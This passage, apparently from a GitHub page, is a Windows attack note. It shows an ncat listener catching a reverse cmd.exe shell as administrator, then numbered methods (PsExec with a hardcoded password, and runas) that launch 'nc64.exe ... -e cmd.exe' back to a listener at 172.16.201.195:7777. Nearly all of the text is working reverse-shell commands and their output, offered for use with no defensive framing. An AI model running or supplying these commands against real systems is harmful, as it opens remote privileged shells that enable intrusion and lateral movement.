You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
# ncat -nlvp 7777
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 8DA3 D4BA 9D5C 4D30 453A 2748 3DFA 8038 C47C C013
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 172.16.201.164.
Ncat: Connection from 172.16.201.164:50057.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Win10\Desktop>whoami
whoami
desktop-bmrp4pl\administrator
3. PsExec (local only)
>PsExec64.exe -accepteula -d \\%COMPUTERNAME% -u WORKGROUP\Administrator -p admin "nc64.exe" -nd 172.16.201.195 7777 -e cmd.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
nc64.exe started with process ID 1564.
4. Runas
C:\Users\Win10\Desktop>runas /noprofile /user:WORKGROUP\Administrator "nc64.exe -nd 172.16.201.195 7777 -e cmd.exe"
Enter the password for WORKGROUP\Administrator:
Attempting to start nc64.exe -nd 172.16.201.195 7777 -e cmd.exe as user "WORKGROUP\Administrator" ...